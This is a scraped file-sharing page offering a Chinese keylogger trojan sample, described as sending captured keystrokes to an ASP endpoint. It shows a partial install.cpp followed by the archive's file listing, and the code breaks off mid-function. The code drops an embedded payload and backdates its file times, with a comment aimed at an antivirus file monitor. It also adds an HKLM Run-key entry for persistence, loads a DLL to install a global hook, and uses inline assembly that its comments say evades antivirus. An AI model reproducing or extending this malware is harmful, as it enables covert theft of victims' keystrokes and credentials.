// install.cpp : Defines the entry point for the application.
#include "StdAfx.h"
#include "resource.h"
#include <windows.h>
#include <Shlwapi.h>
#include "../g_Define.h"
//#define DEVCPP
//使用DEVCPP编译
//#define DEBUG
//调试
/***********Custom add-in libraries*******/
#pragma comment (lib,"kernel32.lib")
#pragma comment (lib,"shell32.lib")
#pragma comment (lib,"user32.lib")
#pragma comment (lib,"MSVCRT.lib")
#pragma comment (lib, "NetApi32.lib")
#pragma comment (linker, "/OPT:NOWIN98")
const char * szObjName = "test";
const char * szAutoRunKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
class CInstall
{
public:
static void QuitProcess();
static char m_szConfigString[MAX_CONFIG_LEN];
static BOOL m_bIsNowSysDir;
static void InitHook();
static void InitMouse();
//让启动漏斗消失
static void UnHook();
static void RunOnce();
static BOOL SendData(void);
static BOOL GetConfigString(char *pBuffer);
static BOOL ForceCopyToFile(char * szOldFileName,char *szNewFileName);
//以下需动态分配内存
static char *m_pAllocRunCmdLine;
static char *m_pAllocDllPath;
static char *m_pAllocSelfPath;
static char *m_pAllocSysDir;
static char *m_pAllocNewFile;
//指针
static char *m_pAspAddress;
static char m_szSendTime[3];
//
static HINSTANCE m_hDll;
static BOOL m_bIsHook;
static int m_iSendSecond;
//发信时间
};
char *CInstall::m_pAllocSelfPath = NULL;
char *CInstall::m_pAllocSysDir = NULL;
char *CInstall::m_pAllocNewFile = NULL;
char *CInstall::m_pAllocDllPath = NULL;
char *CInstall::m_pAllocRunCmdLine = NULL;
char *CInstall::m_pAspAddress = NULL;
BOOL CInstall::m_bIsNowSysDir = FALSE;
HINSTANCE CInstall::m_hDll = NULL;
BOOL CInstall::m_bIsHook = FALSE;
int CInstall::m_iSendSecond = 10; //默认10 min
char CInstall::m_szConfigString[MAX_CONFIG_LEN] = {0};
char CInstall::m_szSendTime[3] = {0};
#ifdef DEBUG
char Dbg_szConfigString[MAX_CONFIG_LEN]= "\0";
MyDbg Dbg(TRUE);
CInstall Dbg_Install;
void Watch(const char *lpStrName,const char *lpStrVal)
{
FILE *fpLog=fopen("install.log","a+");
if(!fpLog)
{
MessageBoxA(0,"退出","",0);
exit(0);
}
fprintf(fpLog,"%s:\"%s\"\n",lpStrName,lpStrVal);
fclose(fpLog);
}
void TestSendData()
{
FILE *fpTest = fopen(SAVE_FILE_NAME,"w");
fprintf(fpTest,"123456789end\n");
fclose(fpTest);
CInstall::SendData();
}
#else
MyDbg Dbg(FALSE);
#endif
////////////////////////
int MemFind(const char *pMemStart, const char *pStrToFind, int iMaxFindLen, int iLenOfStr)
{
int da,i,j;
if (iLenOfStr == 0) da = strlen(pStrToFind);
else da = iLenOfStr;
for (i = 0; i < iMaxFindLen; i++)
{
for (j = 0; j < da; j ++)
if (pMemStart[i+j] != pStrToFind[j]) break;
if (j == da) return i;
}
return -1;
}
BOOL ReleaseRes(HMODULE hModule, WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
//从模块hModule 释放资源wResourceID,资源类型为lpType,
//释放路径为lpFileName
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
char szTmpPath[MAX_PATH];
char szBinPath[MAX_PATH];
// 一定要跟别的区分开,GetTickCount有可能得到一样的值
GetTempPath(sizeof(szTmpPath), szTmpPath);
wsprintf(szBinPath, "%s\\%d_res.tmp", szTmpPath, GetTickCount());
hResInfo = FindResource(hModule, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(hModule, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
szBinPath,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
SYSTEMTIME SysTime;
memset(&SysTime, 0, sizeof(SysTime));
SysTime.wYear = 2004;
SysTime.wMonth = 8;
SysTime.wDay = 17;
SysTime.wHour = 20;
SysTime.wMinute = 0;
FILETIME FileTime,LocalFileTime;
SystemTimeToFileTime(&SysTime, &FileTime);
LocalFileTimeToFileTime(&FileTime,&LocalFileTime);
SetFileTime(hFile, &LocalFileTime, (LPFILETIME) NULL, &LocalFileTime);
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
FreeResource(hRes);
//Fuck KV File Create Monitor
MoveFile(szBinPath, lpFileName);
//SetFileAttributes(lpFileName, FILE_ATTRIBUTE_HIDDEN);
DeleteFile(szBinPath);
return TRUE;
}
void SetAutoRun(const char *szFilePath,const char *szDisplayName)
{
// FILE *fpInstallLog;
HKEY hRunKey = NULL;
TCHAR lpszQuery[MAX_PATH];
LONG iRet = 0;
DWORD dwtype = REG_SZ;
unsigned long dwStrCb = 128;
iRet = RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
szAutoRunKey,
0,
KEY_WRITE|KEY_READ,
&hRunKey
);
iRet = RegQueryValueEx(
hRunKey,
szDisplayName,
NULL,
&dwtype,
(LPBYTE)lpszQuery,
&dwStrCb
);
if(
(iRet==ERROR_SUCCESS)
&&
(strcmp(lpszQuery,szFilePath) != 0)
)
{
//删除旧键值
RegDeleteKey(hRunKey,szDisplayName);
iRet = -1L;
}
if (iRet != ERROR_SUCCESS)
{
//第一次运行
RegSetValueEx(
hRunKey,
szDisplayName,
0,
REG_SZ,
(const unsigned char *)szFilePath,
(strlen(szFilePath)+1) * sizeof(TCHAR)
);
}
//关闭打开的键值。
if (hRunKey != NULL)
{
RegCloseKey(hRunKey);
}
}
BOOL CInstall::ForceCopyToFile(char * szOldFileName,char *szNewFileName)
{
/*
有必要的话可以添加一些操作,达到强制复制文件szOldFileName到szNewFileName
*/
return CopyFile(szOldFileName,szNewFileName,0);
}
void CInstall::InitMouse()
{
//让启动漏斗消失
void *pGetInputState = (void *)GetInputState;
DWORD dwThreadId = GetCurrentThreadId();
void *pPostThreadMessage = (void *)PostThreadMessage;
#ifndef DEVCPP
//非devcpp编译(vc)
__asm
{
//以此免杀
call pGetInputState;
push 0;
push 0;
push 0;
push dwThreadId;
call pPostThreadMessage;
}
#else
GetInputState();
PostThreadMessage(dwThreadId,0,0,0);
#endif
MSG msg;
GetMessage(&msg, 0, 0, 0);
}
BOOL CInstall::GetConfigString(char *pBuffer)
{
int iRet = 0;
FILE *fpSelf = fopen(CInstall::m_pAllocSelfPath,"rb");
if(fpSelf == NULL)
{
MsgBox("无法打开!");
}
fseek(fpSelf,-1 * MAX_CONFIG_LEN,SEEK_END);
iRet = fread(CInstall::m_szConfigString,1,MAX_CONFIG_LEN,fpSelf);
if(iRet == 0)
MsgBox("读取出错!");
fclose(fpSelf);
iRet = MemFind(
CInstall::m_szConfigString,
CONFIG_START,
MAX_CONFIG_LEN,
strlen(CONFIG_START)
);
strcpy(CInstall::m_szConfigString,CInstall::m_szConfigString + iRet);
return TRUE;
}
void CInstall::InitHook()
{
__stdcall_i_pFun_v fpHook = NULL;
CInstall::m_hDll = LoadLibrary(DLL_FILE_NAME);
if(CInstall::m_hDll == NULL)
{
MessageBox(0,"找不到DLL!","出错了!",MB_ICONERROR);
return;
}
fpHook = (__stdcall_i_pFun_v)GetProcAddress(CInstall::m_hDll,"InstallHOOK");
if(fpHook != NULL)
{
fpHook();
Dbg.OutMsg("InitHook Succeed!");
CInstall::m_bIsHook = TRUE;
}
}
void CInstall::RunOnce()
{
DWORD dwLastError;
HANDLE hMutex = CreateMutex(
NULL, //无安全描述
false, //没有所有者
szObjName
); //对象名
if(hMutex == NULL)
{
//hMutex为NULL标示创建失败
MessageBox(NULL,"CreateMutex error!",NULL,MB_OK);
exit(0);
}
dwLastError = GetLastError();
// 普通权限访问系统权限创建的Mutex,如果存在,如果存在就返回拒绝访问的错误
// 已经安装过一个一模一样配置的,就不安装了
if (dwLastError == ERROR_ALREADY_EXISTS || dwLastError == ERROR_ACCESS_DENIED)
{
没有合适的资源?快使用搜索试试~ 我知道了~
键盘记录木马样例,支持asp收信
共50个文件
h:13个
cpp:7个
rc:5个
5星 · 超过95%的资源 需积分: 10 59 下载量 44 浏览量
2011-01-02
02:15:51
上传
评论 1
收藏 83KB RAR 举报
温馨提示
自己写的一个键盘记录器,支持asp收信,自动运行,解决了半个汉字问题等,vc6和devcpp下编译通过
资源推荐
资源详情
资源评论
收起资源包目录
keyboardhookdev.rar (50个子文件)
keyboardhookdev
test.asp 247B
Include
MYMALLOC.h 11KB
mysocket.h 7KB
main
main.cpp 10KB
main.h 2KB
resource.h 866B
main.dsp 4KB
main.rc.2 2KB
main.dev 2KB
1.cpp 3KB
工程1.dev 1KB
Debug
main.rc 2KB
main_private.rc 92B
main.dsw 514B
main.o 21KB
1.o 1KB
Release
clear.BAT 314B
工程1_private.h 572B
res
1.ico 766B
keyboard.ico 766B
main_private.h 587B
main.opt 48KB
Makefile.win 1KB
keyboardhook.opt 59KB
keyboardhook.dsw 910B
g_Define.h 3KB
g_Define.cpp 2B
clear.BAT 349B
BIN
HOOK
StdAfx.cpp 291B
resource.h 450B
HOOK.cpp 7KB
hook.def 79B
HOOK.H 767B
HOOK.dsw 533B
Debug
HOOK.dev 2KB
StdAfx.h 802B
HOOK.dsp 4KB
Makefile.win 1KB
install
StdAfx.cpp 294B
resource.h 529B
install.dsp 4KB
install.cpp 15KB
install_private.h 602B
Debug
install.rc 2KB
StdAfx.h 771B
install.dev 2KB
Release
res
HOOK.dll 72KB
Script1.rc 3KB
install_private.rc 95B
Makefile.win 1KB
共 50 条
- 1
资源评论
- samlyf1152013-12-09对我有点用!
ccnyou
- 粉丝: 93
- 资源: 17
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功